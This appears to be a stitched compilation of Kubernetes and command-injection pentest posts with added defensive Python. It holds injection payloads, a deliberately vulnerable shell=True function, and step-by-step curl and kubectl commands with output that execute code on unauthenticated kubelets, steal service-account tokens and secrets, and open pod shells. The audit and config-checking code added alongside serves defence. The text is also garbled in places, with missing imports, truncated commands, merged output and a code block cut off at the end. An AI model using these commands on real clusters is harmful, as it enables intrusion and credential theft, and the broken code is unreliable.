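import subprocess
from typing import List

# RFC 1123-style hostname or dotted IPv4 only: labels of alnum and '-', not starting with '-',
# no spaces, separators, quotes or substitution characters.  \Z (not $) so a trailing newline
# cannot sneak through.
HOSTNAME_RE = re.compile(
    r"(?=.{1,253}\Z)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*"
)

# Constructed payloads in the shapes an injection tool tries: command separators,
# pipes, $() and backtick substitution, and a raw newline.
INJECTION_PAYLOADS = ["127.0.0.1; id", "127.0.0.1 && id", "127.0.0.1 | id",
                      "127.0.0.1 $(id)", "127.0.0.1 `id`", "127.0.0.1\nid"]

SHELL_META = (";", "&&", "|", "$(", "`", "\n")


def vulnerable_command(host: str) -> str:
    """The bug: the request parameter is concatenated into a shell string that is later
    run with shell=True, so every separator in the payload starts a second command."""
    return "ping -c 1 " + host


def run_vulnerable(host: str) -> str:
    """Executes whatever the attacker appended (demonstration only; do not ship this)."""
    return subprocess.run(vulnerable_command(host), shell=True,
                          capture_output=True, text=True).stdout


def hardened_argv(host: str) -> List[str]:
    """Allow-list the input, then pass it as a single argv element with no shell at all.
    The regex also forbids a leading '-', so the value cannot become a ping option."""
    if not HOSTNAME_RE.fullmatch(host):
        raise ValueError(f"invalid host: {host!r}")
    return ["ping", "-c", "1", host]


def run_hardened(host: str) -> str:
    return subprocess.run(hardened_argv(host), capture_output=True, text=True).stdout


def survives_injection(host: str) -> bool:
    """True when shell metacharacters from the payload reach the command string intact."""
    cmd = vulnerable_command(host)
    return any(m in cmd for m in SHELL_META)


def hardened_rejects_all(payloads=INJECTION_PAYLOADS) -> bool:
    """True when every injection payload is refused before any process is spawned."""
    for p in payloads:
        try:
            hardened_argv(p)
            return False
        except ValueError:
            continue
    return True


if __name__ == "__main__":
    for p in INJECTION_PAYLOADS:
        print(f"{p!r:24} reaches shell: {survives_injection(p)}")
    print("hardened rejects all payloads:", hardened_rejects_all())
    print("hardened argv for example.com:", hardened_argv("example.com"))
```

Testbeds in the wiki page mentioned above are the right place to run commix against the vulnerable path; the hardened path should produce only the "invalid host" error for every payload commix sends.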

Link: http://feedproxy.google.com/~r/PentestTools/~3/mjOk7rQhp2Y/commix-v27-automated-all-in-one-os.html

Kubernetes: unauth kublet API 10250 basic code exec

Unauth API access (10250)

Most Kubernetes deployments provide authentication for this port. But it's still possible to expose it inadvertently, and it's still pretty common to find it reachable because the kubelet was started with anonymous requests enabled (--anonymous-auth=true) and authorization mode AlwaysAllow, historically the defaults. Everybody who can reach the kubelet port (10250), even without a certificate, can then execute any command inside any container on that node.

  # /run/%namespace%/%pod_name%/%container_name%

example:

  $ curl -k -XPOST "https://k8s-node-1:10250/run/kube-system/node-exporter-iuwg7/node-exporter" -d "cmd=ls -la /"
  total 12
  drwxr-xr-x   13 root     root           148 Aug 26 11:31 .
  drwxr-xr-x   13 root     root           148 Aug 26 11:31 ..
  -rwxr-xr-x    1 root     root             0 Aug 26 11:31 .dockerenv
  drwxr-xr-x    2 root     root          8192 May  5 22:22 bin
  drwxr-xr-x    5 root     root           380 Aug 26 11:31 dev
  drwxr-xr-x    3 root     root           135 Aug 26 11:31 etc
  drwxr-xr-x    2 nobody   nogroup          6 Mar 18 16:38 home
  drwxr-xr-x    2 root     root             6 Apr 23 11:17 lib
  dr-xr-xr-x  353 root     root             0 Aug 26 07:14 proc
  drwxr-xr-x    2 root     root             6 Mar 18 16:38 root
  dr-xr-xr-x   13 root     root             0 Aug 26 15:12 sys
  drwxrwxrwt    2 root     root             6 Mar 18 16:38 tmp
  drwxr-xr-x    4 root     root            31 Apr 23 11:17 usr
  drwxr-xr-x    5 root     root            41 Aug 26 11:31 var

Here is how to get all secrets which the container uses (environment variables; it is common to see kubelet tokens here):

  $ curl -k -XPOST "https://k8s-node-1:10250/run/kube-system/

The list of all pods and containers which were scheduled on the Kubernetes worker node can be retrieved using the command below:

  $ curl -sk https://k8s-node-1:10250/runningpods/ | python -mjson.tool

or

  $ curl --insecure https://k8s-node-1:10250/runningpods | jq

Example 1:

  $ curl --insecure https://1.2.3.4:10250/runningpods | jq

Output:

  Forbidden (user=system:anonymous, verb=create, resource=nodes, subresource=proxy)

The kubelet accepted the request as system:anonymous but its authorizer (Webhook mode, i.e. a SubjectAccessReview answered by the API server's RBAC) denied nodes/proxy. Anonymous auth is on, AlwaysAllow is not.

Example 2:

  $ curl --insecure https://1.2.3.4:10250/runningpods | jq

Output:

  Unauthorized

Anonymous auth is off: the request was rejected before authorization, and you would need a client certificate or bearer token the kubelet accepts.

Example 3:

  $ curl --insecure https://1.2.3.4:10250/runningpods | jq

Output:

  {
    "kind": "PodList",
    "apiVersion": "v1",
    "metadata": {},
    "items": [
      {
        "metadata": {
          "name": "kube-dns-5b8bf6c4f4-k5n2g",
          "generateName": "kube-dns-5b8bf6c4f4-",
          "namespace": "kube-system",
          "selfLink": "/api/v1/namespaces/kube-system/pods/kube-dns-5b8bf6c4f4-k5n2g",
          "uid": "63438841-e43c-11e8-a104-42010a80038e",
          "resourceVersion": "85366060",
          "creationTimestamp": "2018-11-09T16:27:44Z",
          "labels": {
            "k8s-app": "kube-dns",
            "pod-template-hash": "1646927090"
          },
          "annotations": {
            "kubernetes.io/config.seen": "2018-11-09T16:27:44.990071791Z",
            "kubernetes.io/config.source": "api",
            "scheduler.alpha.kubernetes.io/critical-pod": ""
          },
          "ownerReferences": [
            {
              "apiVersion": "extensions/v1beta1",
              "kind": "ReplicaSet",
              "name": "kube-dns-5b8bf6c4f4",
              "uid": "633db9d4-e43c-11e8-a104-42010a80038e",
              "controller": true
            }
          ]
        },
        "spec": {
          "volumes": [
            {
              "name": "kube-dns-config",
              "configMap": {
                "name": "kube-dns",
                "defaultMode": 420
              }
            },
            {
              "name": "kube-dns-token-xznw5",
              "secret": {
                "secretName": "kube-dns-token-xznw5",
                "defaultMode": 420
              }
            }
          ],
          "containers": [
            {
              "name": "dnsmasq",
              "image": "gcr.io/google-containers/k8s-dns-dnsmasq-nanny-amd64:1.14.10",
              "args": [
                "-v=2",
                "-logtostderr",
                "-configDir=/etc/k8s/dns/dnsmasq-nanny",
                "-restartDnsmasq=true",
                "--",
                "-k",
                "--cache-size=1000",
                "--no-negcache",
                "--log-facility=-",
                "--server=/cluster.local/127.0.0.1#10053",
                "--server=/in-addr.arpa/127.0.0.1#10053",
                "--server=/ip6.arpa/127.0.0.1#10053"
              ],
              "ports": [
                {
                  "name": "dns",
                  "containerPort": 53,
                  "protocol": "UDP"
                },
                {
                  "name": "dns-tcp",
                  "containerPort": 53,
                  "protocol": "TCP"
                }
              ],
              "resources": {
                "requests": {
                  "cpu": "150m",
                  "memory": "20Mi"
                }
              },
              "volumeMounts": [
                {
                  "name": "kube-dns-config",
                  "mountPath": "/etc/k8s/dns/dnsmasq-nanny"
                },
                {
                  "name": "kube-dns-token-xznw5",
                  "readOnly": true,
                  "mountPath": "/var/run/secrets/kubernetes.io/serviceaccount"
                }
              ],
              "livenessProbe": {
                "httpGet": {
                  "path": "/healthcheck/dnsmasq",
                  "port": 10054,
                  "scheme": "HTTP"
                },
                "initialDelaySeconds": 60,
                "timeoutSeconds": 5,
                "periodSeconds": 10,
                "successThreshold": 1,
                "failureThreshold": 5
              },
              "terminationMessagePath": "/dev/termination-log",
              "imagePullPolicy": "IfNotPresent"
            },
  --------SNIP--------

Anonymous requests are fully authorized on this node: it is open. Note the service account token mounted at /var/run/secrets/kubernetes.io/serviceaccount in the dnsmasq container; reading it through /run gives you that pod's identity against the API server.

With the output of the running pods command you can craft your command to do the code exec:

  $ curl -k -XPOST "https://k8s-node-1:10250/run/

as an example: the path is /run/<namespace>/<pod_name>/<container_name>, taken from metadata.namespace, metadata.name and spec.containers[].name in the PodList above, which leaves you with:

  $ curl -k -XPOST "https://kube-node-here:10250/run/kube-system/kube-dns-5b8bf6c4f4-k5n2g/dnsmasq" -d "cmd=ls -la /"
  total 35264
  drwxr-xr-x    1 root     root          4096 Nov  9 16:27 .
  drwxr-xr-x    1 root     root          4096 Nov  9 16:27 ..
  -rwxr-xr-x    1 root     root             0 Nov  9 16:27 .dockerenv
  drwxr-xr-x    2 root
  root          4096 Nov  9 16:27 bindrwxr-xr-x    5 root     root           380 Nov  9 16:27 dev-rwxr-xr-x    1 root     root      36047205 Apr 13  2018 dnsmasq-nannydrwxr-xr-x    1 root     root          4096 Nov  9 16:27 etcdrwxr-xr-x    2 root     root          4096 Jan  9  2018 homedrwxr-xr-x    5 root     root          4096 Nov  9 16:27 libdrwxr-xr-x    5 root     root          4096 Nov  9 16:27 mediadrwxr-xr-x    2 root     root          4096 Jan  9  2018 mntdr-xr-xr-x  125 root     root             0 Nov  9 16:27 procdrwx——    2 root     root          4096 Jan  9  2018 rootdrwxr-xr-x    2 root     root          4096 Jan  9  2018 rundrwxr-xr-x    2 root     root          4096 Nov  9 16:27 sbindrwxr-xr-x    2 root     root          4096 Jan  9  2018 srvdr-xr-xr-x   12 root     root             0 Nov  9 16:27 sysdrwxrwxrwt    1 root     root          4096 Nov  9 17:00 tmpdrwxr-xr-x    7 root     root          4096 Nov  9 16:27 usrdrwxr-xr-x    1 root     root          4096 Nov  9 16:27 var
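The three example responses above are what an auditor checking their own nodes gets back from /runningpods/, and each one means something different about the kubelet's auth posture: "Forbidden (user=system:anonymous ...)" means anonymous requests are authenticated but denied by the authorizer, "Unauthorized" means anonymous auth is off, and a PodList means the port is open. The following is an added example (not code from the original post) that classifies a saved response body and, for the open case, lists which containers on the node are privileged or have a service-account token mounted, which is what an incident responder needs to scope the exposure. The sample bodies are constructed to mirror the page's output; the node-exporter image name is a placeholder.

```python
import json

# Path where Kubernetes mounts a pod's service-account token (as seen in the
# volumeMounts of the page's kube-dns pod).
SA_TOKEN_DIR = "/var/run/secrets/kubernetes.io/serviceaccount"

# Constructed sample bodies modelled on Examples 1-3 above (not captured output).
SAMPLE_FORBIDDEN = ("Forbidden (user=system:anonymous, verb=create, "
                    "resource=nodes, subresource=proxy)")
SAMPLE_UNAUTHORIZED = "Unauthorized"
SAMPLE_PODLIST = json.dumps({
    "kind": "PodList",
    "apiVersion": "v1",
    "items": [
        {
            "metadata": {"name": "kube-dns-5b8bf6c4f4-k5n2g", "namespace": "kube-system"},
            "spec": {
                "volumes": [{"name": "kube-dns-token-xznw5",
                             "secret": {"secretName": "kube-dns-token-xznw5"}}],
                "containers": [{
                    "name": "dnsmasq",
                    "image": "gcr.io/google-containers/k8s-dns-dnsmasq-nanny-amd64:1.14.10",
                    "volumeMounts": [{"name": "kube-dns-token-xznw5", "readOnly": True,
                                      "mountPath": SA_TOKEN_DIR}],
                }],
            },
        },
        {
            "metadata": {"name": "node-exporter-1fmd9-z9685", "namespace": "monitoring"},
            "spec": {
                "volumes": [],
                "containers": [{
                    "name": "node-exporter",
                    "image": "example.invalid/node-exporter:placeholder",  # placeholder image
                    "securityContext": {"privileged": True},
                }],
            },
        },
    ],
})


def classify_response(body):
    """Map a /runningpods/ response body to an auth posture.

    'forbidden'    - anonymous auth is on but the authorizer denied system:anonymous
    'unauthorized' - anonymous auth is off; the kubelet wants a token or client cert
    'open'         - a PodList came back, so anonymous requests are being served
    """
    text = body.strip()
    if text.startswith("Forbidden"):
        return "forbidden"
    if text.startswith("Unauthorized"):
        return "unauthorized"
    try:
        doc = json.loads(text)
    except ValueError:
        return "unknown"
    return "open" if doc.get("kind") == "PodList" else "unknown"


def container_findings(podlist):
    """For an open kubelet, list every container on the node with the two
    properties a responder cares about first: is it privileged, and does it
    carry a service-account token that could be replayed against the API server."""
    findings = []
    for pod in podlist.get("items", []):
        meta = pod.get("metadata", {})
        for c in pod.get("spec", {}).get("containers", []):
            sc = c.get("securityContext") or {}
            mounts = c.get("volumeMounts") or []
            findings.append({
                "namespace": meta.get("namespace"),
                "pod": meta.get("name"),
                "container": c["name"],
                "privileged": bool(sc.get("privileged", False)),
                "sa_token_mounted": any(m.get("mountPath") == SA_TOKEN_DIR for m in mounts),
            })
    return findings


def audit(body):
    """Return (posture, findings); findings is empty unless the port is open."""
    posture = classify_response(body)
    if posture != "open":
        return posture, []
    return posture, container_findings(json.loads(body))


if __name__ == "__main__":
    for sample in (SAMPLE_FORBIDDEN, SAMPLE_UNAUTHORIZED, SAMPLE_PODLIST):
        posture, findings = audit(sample)
        print(posture)
        for f in findings:
            print("  ", f)
```

Feed it the saved body of a request you made against your own node; only the "open" posture needs follow-up, and the findings tell you which pods to treat as compromised (privileged ones give node-level access, token-bearing ones give API-server access as that service account).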

Link: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-unauth-kublet-api-10250.html

Kubernetes: Kube-Hunter 10255

Below is some sample output that mainly is here to see what an open 10255 will give you and look like. What is probably of most interest is the /pods endpoint, the /metrics endpoint, or the /stats endpoint.

$ ./kube-hunter.py
Choose one of the options below:
1. Remote scanning      (scans one or more specific IPs or DNS names)
2. Subnet scanning      (scans subnets on all local network interfaces)
3. IP range scanning    (scans a given IP range)
Your choice: 1
Remotes (separated by a ','): 1.2.3.4
~ Started
~ Discovering Open Kubernetes Services...
|
| Etcd:
|   type: open service
|   service: Etcd
|_  host: 1.2.3.4:2379
|
| API Server:
|   type: open service
|   service: API Server
|_  host: 1.2.3.4:443
|
| API Server:
|   type: open service
|   service: API Server
|_  host: 1.2.3.4:6443
|
| Etcd Remote version disclosure:
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Remote version disclosure might give an
|_    attacker a valuable data to attack a cluster
|
| Etcd is accessible using insecure connection (HTTP):
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Etcd is accessible using HTTP (without
|     authorization and authentication), it would allow a
|     potential attacker to
|     gain access to
|_    the etcd
|
| Kubelet API (readonly):
|   type: open service
|   service: Kubelet API (readonly)
|_  host: 1.2.3.4:10255
|
| Etcd Remote Read Access Event:
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Remote read access might expose to an
|_    attacker cluster's possible exploits, secrets and more.
|
| K8s Version Disclosure:
|   type: vulnerability
|   host: 1.2.3.4:10255
|   description:
|     The kubernetes version could be obtained
|_    from logs in the /metrics endpoint
|
| Privileged Container:
|   type: vulnerability
|   host: 1.2.3.4:10255
|   description:
|     A Privileged container exist on a node.
|     could expose the node/cluster to unwanted root
|_    operations
|
| Cluster Health Disclosure:
|   type: vulnerability
|   host: 1.2.3.4:10255
|   description:
|     By accessing the open /healthz handler, an
|     attacker could get the cluster health state without
|_    authenticating
|
| Exposed Pods:
|   type: vulnerability
|   host: 1.2.3.4:10255
|   description:
|     An attacker could view sensitive information
|     about pods that are bound to a Node using
|_    the /pods endpoint
----------

Nodes
+-------------+---------------+
| TYPE        | LOCATION      |
+-------------+---------------+
| Node/Master | 1.2.3.4       |
+-------------+---------------+

Detected Services
+----------------------+---------------------+----------------------+
| SERVICE              | LOCATION            | DESCRIPTION          |
+----------------------+---------------------+----------------------+
| Kubelet API          | 1.2.3.4:10255       | The read-only port   |
| (readonly)           |                     | on the kubelet       |
|                      |                     | serves health        |
|                      |                     | probing endpoints,   |
|                      |                     | and is relied upon   |
|                      |                     | by many kubernetes   |
|                      |                     | componenets          |
+----------------------+---------------------+----------------------+
| Etcd                 | 1.2.3.4:2379        | Etcd is a DB that    |
|                      |                     | stores cluster's     |
|                      |                     | data, it contains    |
|                      |                     | configuration and    |
|                      |                     | current state        |
|                      |                     | information, and     |
|                      |                     | might contain        |
|                      |                     | secrets              |
+----------------------+---------------------+----------------------+
| API Server           | 1.2.3.4:6443        | The API server is in |
|                      |                     | charge of all        |
|                      |                     | operations on the    |
|                      |                     | cluster.             |
+----------------------+---------------------+----------------------+
| API Server           | 1.2.3.4:443         | The API server is in |
|                      |                     | charge of all        |
|                      |                     | operations on the    |
|                      |                     | cluster.             |
+----------------------+---------------------+----------------------+

Vulnerabilities
+---------------------+----------------------+----------------------+----------------------+----------------------+
| LOCATION            | CATEGORY             | VULNERABILITY        | DESCRIPTION          | EVIDENCE             |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:2379        | Unauthenticated      | Etcd is accessible   | Etcd is accessible   | {"etcdserver":"2.3.8 |
|                     | Access               | using insecure       | using HTTP (without  | ","etcdcluster":"2.3 |
|                     |                      | connection (HTTP)    | authorization and    | ...                  |
|                     |                      |                      | authentication), it  |                      |
|                     |                      |                      | would allow a        |                      |
|                     |                      |                      | potential attacker   |                      |
|                     |                      |                      | to                   |                      |
|                     |                      |                      |      gain access to  |                      |
|                     |                      |                      | the etcd             |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:2379        | Information          | Etcd Remote version  | Remote version       | {"etcdserver":"2.3.8 |
|                     | Disclosure           | disclosure           | disclosure might     | ","etcdcluster":"2.3 |
|                     |                      |                      | give an attacker a   | ...                  |
|                     |                      |                      | valuable data to     |                      |
|                     |                      |                      | attack a cluster     |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:10255       | Information          | K8s Version          | The kubernetes       | v1.5.6-rc17          |
|                     | Disclosure           | Disclosure           | version could be     |                      |
|                     |                      |                      | obtained from logs   |                      |
|                     |                      |                      | in the /metrics      |                      |
|                     |                      |                      | endpoint             |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:10255       | Information          | Exposed Pods         | An attacker could    | count: 68            |
|                     | Disclosure           |                      | view sensitive       |                      |
|                     |                      |                      | information about    |                      |
|                     |                      |                      | pods that are bound  |                      |
|                     |                      |                      | to a Node using the  |                      |
|                     |                      |                      | /pods endpoint       |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:10255       | Information          | Cluster Health       | By accessing the     | status: ok           |
|                     | Disclosure           | Disclosure           | open /healthz        |                      |
|                     |                      |                      | handler, an attacker |                      |
|                     |                      |                      | could get the        |                      |
|                     |                      |                      | cluster health state |                      |
|                     |                      |                      | without              |                      |
|                     |                      |                      | authenticating       |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:2379        | Access Risk          | Etcd Remote Read     | Remote read access   | {"action":"get","nod |
|                     |                      | Access Event         | might expose to an   | e":{"dir":true,"node |
|                     |                      |                      | attacker cluster's   | ...                  |
|                     |                      |                      | possible exploits,   |                      |
|                     |                      |                      | secrets and more.    |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:10255       | Access Risk          | Privileged Container | A Privileged         | pod: node-exporter-  |
|                     |                      |                      | container exist on a | 1fmd9-z9685,         |
|                     |                      |                      | node. could expose   | containe...          |
|                     |                      |                      | the node/cluster to  |                      |
|                     |                      |                      | unwanted root        |                      |
|                     |                      |                      | operations           |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+
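Every 10255 finding in the kube-hunter report above (exposed /pods, /metrics version disclosure, /healthz, privileged-container evidence) comes from the kubelet's read-only port, and the 10250 findings in the neighbouring posts come from anonymous authentication plus a permissive authorizer. Those are three settings in the kubelet's configuration file. The following is an added example, not part of the kube-hunter post or project, that audits a KubeletConfiguration (the real kubelet.config.k8s.io/v1beta1 field names, expressed here as Python dicts rather than YAML so the check runs stand-alone) and reports the weak settings beside a hardened version. The two configuration fragments are constructed; the client CA path in the hardened one is a placeholder.

```python
# Constructed KubeletConfiguration fragments, expressed as dicts. WEAK reproduces
# the posture kube-hunter reported above: read-only port serving, anonymous
# requests accepted on 10250, and an authorizer that allows everything.
WEAK = {
    "apiVersion": "kubelet.config.k8s.io/v1beta1",
    "kind": "KubeletConfiguration",
    "readOnlyPort": 10255,
    "authentication": {
        "anonymous": {"enabled": True},
        "webhook": {"enabled": False},
    },
    "authorization": {"mode": "AlwaysAllow"},
}

# HARDENED closes 10255, refuses anonymous requests, authenticates with bearer
# tokens (via the API server's TokenReview webhook) or client certificates, and
# delegates authorization to the API server (SubjectAccessReview).
HARDENED = {
    "apiVersion": "kubelet.config.k8s.io/v1beta1",
    "kind": "KubeletConfiguration",
    "readOnlyPort": 0,
    "authentication": {
        "anonymous": {"enabled": False},
        "webhook": {"enabled": True},
        "x509": {"clientCAFile": "/etc/kubernetes/pki/ca.crt"},  # placeholder path
    },
    "authorization": {"mode": "Webhook"},
}


def audit_kubelet_config(cfg):
    """Return a list of (field, problem) tuples for a KubeletConfiguration dict.

    Fields that are absent are reported as well: the config-file defaults differ
    from the legacy command-line flag defaults, so an explicit value is the only
    way a reviewer can be sure which posture the node actually runs with.
    """
    findings = []

    ro = cfg.get("readOnlyPort")
    if ro is None:
        findings.append(("readOnlyPort", "not set explicitly; set 0 to close 10255"))
    elif ro != 0:
        findings.append(("readOnlyPort",
                         f"port {ro} serves /pods, /metrics and /stats without auth"))

    auth = cfg.get("authentication", {})
    anon = auth.get("anonymous", {}).get("enabled")
    if anon is None:
        findings.append(("authentication.anonymous.enabled", "not set explicitly"))
    elif anon:
        findings.append(("authentication.anonymous.enabled",
                         "anonymous (system:anonymous) requests are accepted on 10250"))

    webhook = auth.get("webhook", {}).get("enabled")
    client_ca = auth.get("x509", {}).get("clientCAFile")
    if not webhook and not client_ca:
        findings.append(("authentication",
                         "neither webhook token auth nor an x509 client CA is configured"))

    mode = cfg.get("authorization", {}).get("mode")
    if mode != "Webhook":
        findings.append(("authorization.mode",
                         f"{mode!r} does not delegate to the API server; use Webhook"))
    return findings


if __name__ == "__main__":
    for label, cfg in (("WEAK", WEAK), ("HARDENED", HARDENED)):
        print(label)
        for field, problem in audit_kubelet_config(cfg) or [("-", "no findings")]:
            print(f"  {field}: {problem}")
```

To use it on a real node, load the file the kubelet was started with (`--config`) with a YAML parser and pass the resulting dict; a clean result on every node is what makes the kube-hunter 10255 findings and the 10250 exec in the other posts go away, assuming the API server is also unreachable anonymously.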

Link: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kube-hunter-10255.html

Kubernetes: unauth kublet API 10250 token theft & kubectl

Kubernetes: unauthenticated kublet API (10250) token theft & kubectl access & exec

kube-hunter output to get us started: do a curl -s https://k8-node:10250/runningpods/ to get a list of running pods.

With that data, you can craft your POST request to exec within a pod so we can poke around. Example request:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=ls -la /"

Output:
total 35264
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 .
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 ..
-rwxr-xr-x    1 root     root             0 Nov  9 16:27 .dockerenv
drwxr-xr-x    2 root     root          4096 Nov  9 16:27 bin
drwxr-xr-x    5 root     root           380 Nov  9 16:27 dev
-rwxr-xr-x    1 root     root      36047205 Apr 13  2018 dnsmasq-nanny
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 etc
drwxr-xr-x    2 root     root          4096 Jan  9  2018 home
drwxr-xr-x    5 root     root          4096 Nov  9 16:27 lib
drwxr-xr-x    5 root     root          4096 Nov  9 16:27 media
drwxr-xr-x    2 root     root          4096 Jan  9  2018 mnt
dr-xr-xr-x  134 root     root             0 Nov  9 16:27 proc
drwx------    2 root     root          4096 Jan  9  2018 root
drwxr-xr-x    2 root     root          4096 Jan  9  2018 run
drwxr-xr-x    2 root     root          4096 Nov  9 16:27 sbin
drwxr-xr-x    2 root     root          4096 Jan  9  2018 srv
dr-xr-xr-x   12 root     root             0 Dec 19 19:06 sys
drwxrwxrwt    1 root     root          4096 Nov  9 17:00 tmp
drwxr-xr-x    7 root     root          4096 Nov  9 16:27 usr
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 var

Check the env and see if the kubelet tokens are in the environment variables. Depending on the cloud provider or hosting provider they are sometimes right there. Otherwise we need to retrieve them from:

1. the mounted folder
2. the cloud metadata url

Check the env with the following command:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=env"

We are looking for the KUBLET_CERT, KUBLET_KEY, & CA_CERT environment variables.

We are also looking for the kubernetes API server. This is most likely NOT the host you are messing with on 10250. We are looking for something like:

KUBERNETES_PORT=tcp://10.10.10.10:443

or

KUBERNETES_MASTER_NAME: 10.11.12.13:443

Once we get the kubernetes tokens or keys we need to talk to the API server to use them. The kubelet (10250) won't know what to do with them. This may be (if we are lucky) another public IP or a 10. IP. If it's a 10. IP we need to download kubectl to the pod.

Assuming it's not in the environment variables, let's look and see if they are there in the mounted secrets:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=mount"

sample output truncated:
cgroup on /sys/fs/cgroup/devices type cgroup (ro,nosuid,nodev,noexec,relatime,devices)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
/dev/sda1 on /dev/termination-log type ext4 (rw,relatime,commit=30,data=ordered)
/dev/sda1 on /etc/k8s/dns/dnsmasq-nanny type ext4 (rw,relatime,commit=30,data=ordered)
tmpfs on /var/run/secrets/kubernetes.io/serviceaccount type tmpfs (ro,relatime)
/dev/sda1 on /etc/resolv.conf type ext4 (rw,nosuid,nodev,relatime,commit=30,data=ordered)
/dev/sda1 on /etc/hostname type ext4 (rw,nosuid,nodev,relatime,commit=30,data=ordered)
/dev/sda1 on /etc/hosts type ext4 (rw,relatime,commit=30,data=ordered)
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)

We can then cat out the ca.crt, namespace, and token:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=ls -la /var/run/secrets/kubernetes.io/serviceaccount"

Output:
total 4
drwxrwxrwt    3 root     root         140 Nov  9 16:27 .
drwxr-xr-x    3 root     root        4.0K Nov  9 16:27 ..
lrwxrwxrwx    1 root     root          13 Nov  9 16:27 ca.crt -> ..data/ca.crt
lrwxrwxrwx    1 root     root          16 Nov  9 16:27 namespace -> ..data/namespace
lrwxrwxrwx    1 root     root          12 Nov  9 16:27 token -> ..data/token

and then:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token"

output:
eyJhbGciOiJSUzI1NiI---SNIP---

Also grab the ca.crt :-)

With the token, ca.crt and API server IP address we can issue commands with kubectl.

$ kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI---SNIP--- get pods --all-namespaces

Output:
NAMESPACE     NAME                                                            READY     STATUS    RESTARTS   AGE
kube-system   event-exporter-v0.1.9-5c-SNIP                          2/2       Running   2          120d
kube-system   fluentd-cloud-logging-gke-eeme-api-default-pool   1/1       Running   1          2y
kube-system   heapster-v1.5.2-5-SNIP                              3/3       Running   0          27d
kube-system   kube-dns-5b8-SNIP                                       4/4       Running   0          61d
kube-system   kube-dns-autoscaler-2-SNIP                             1/1       Running   1          252d
kube-system   kube-proxy-gke-eeme-api-default-pool              1/1       Running   1          2y
kube-system   kubernetes-dashboard-7-SNIP                           1/1       Running   0          27d
kube-system   l7-default-backend-10-SNIP                            1/1       Running   0          27d
kube-system   metrics-server-v0.2.1-7-SNIP                         2/2       Running   0          120d

At this point you can pull secrets or exec into any available pods:

$ kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI---SNIP--- get secrets --all-namespaces

To get a shell via kubectl:

$ kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI---SNIP--- get pods --namespace=kube-system
NAME                                                            READY     STATUS    RESTARTS   AGE
event-exporter-v0.1.9-5-SNIP               2/2       Running   2          120d
--SNIP--
metrics-server-v0.2.1-7f8ee58c8f-ab13f     2/2       Running   0          120d

$ kubectl exec -it metrics-server-v0.2.1-7f8ee58c8f-ab13f --namespace=kube-system --server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI---SNIP--- /bin/sh
/ # ls -lah
total 40220
drwxr-xr-x    1 root     root        4.0K Sep 11 07:25 .
drwxr-xr-x    1 root     root        4.0K Sep 11 07:25 ..
-rwxr-xr-x    1 root     root           0 Sep 11 07:25 .dockerenv
drwxr-xr-x    3 root     root        4.0K Sep 11 07:25 apiserver.local.config
drwxr-xr-x    2 root     root       12.0K Sep 11 07:24 bin
drwxr-xr-x    5 root     root         380 Sep 11 07:25 dev
drwxr-xr-x    1 root     root        4.0K Sep 11 07:25 etc
drwxr-xr-x    2 nobody   nogroup     4.0K Nov  1  2017 home
-rwxr-xr-x    2 root     root       39.2M Dec 20  2017 metrics-server
dr-xr-xr-x  135 root     root           0 Sep 11 07:25 proc
drwxr-xr-x    1 root     root        4.0K Dec 19 21:33 root
dr-xr-xr-x   12 root     root           0 Dec 19 19:06 sys
drwxrwxrwt    1 root     root        4.0K Oct 18 13:57 tmp
drwxr-xr-x    3 root     root        4.0K Sep 11 07:24 usr
drwxr-xr-x    1 root     root        4.0K Sep 11 07:25 var

For completeness, if you got the keys via the environment variables the kubectl command would be something like this:

kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --client-key=kublet.key --client-certificate=kublet.crt get pods --all-namespaces
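The token read out of /var/run/secrets/kubernetes.io/serviceaccount above is a JWT, and its payload names the service account, namespace and (for secret-backed tokens of the kind shown here, which never expire) the Secret object that has to be deleted to revoke it. When a responder finds such a token in a log, a ticket or a dumped environment, the first question is which account it belongs to. The following is an added example, not code from the original post, that decodes the claims without verifying the signature (identification only; the API server still does the verification) and handles both the legacy secret-based claim names and the newer bound-token claims, which the post does not cover. The tokens it decodes are constructed inline with a dummy signature; no real token appears here.

```python
import base64
import json


def _b64url_decode(segment):
    """JWT segments drop base64 padding; restore it before decoding."""
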